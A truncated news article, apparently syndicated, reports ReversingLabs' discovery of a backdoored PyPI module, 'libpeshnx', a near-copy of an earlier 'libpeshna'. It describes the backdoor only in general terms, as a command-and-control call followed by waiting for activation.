The pace of modern software development requires code reuse, and effective code reuse requires code repositories. These collections of code fragments, functions, libraries, and modules allow developers to write applications without having to reinvent every small (or large) detail in their code. That makes repositories very valuable to developers – and very rich targets for malicious actors.
Researchers at ReversingLabs have discovered the most recent attack against a repository: a module that carries a backdoor found in popular Python repository Python Package Index (also known as PyPI or Cheese Shop). This isn't the first time PyPI has been attacked, but this one is notable because it involves malicious code thought to have been previously fixed.
"Essentially, a backdoor that has been reported before but hasn't been cleaned completely from the repository was still available and live on the Web page," says Robert Perica, principal engineer at ReversingLabs. And while the package involved is not ubiquitous, it is being used. "What's troubling about this package is that even though it's not a popular package, it averages 82 installs per month," Perica says.
The malware resides in a module named "libpeshnx," which is similar to an earlier module named "libpeshna" and was contributed by the same author. According to ReversingLabs' blog post on the discovery, the actual backdoor mechanism is very simple, involving a call to a command-and-control server followed by a wait to be activated.
A Supply Chain AttackRecent years have seen an incre ..
Support the originator by clicking the read the rest link below.
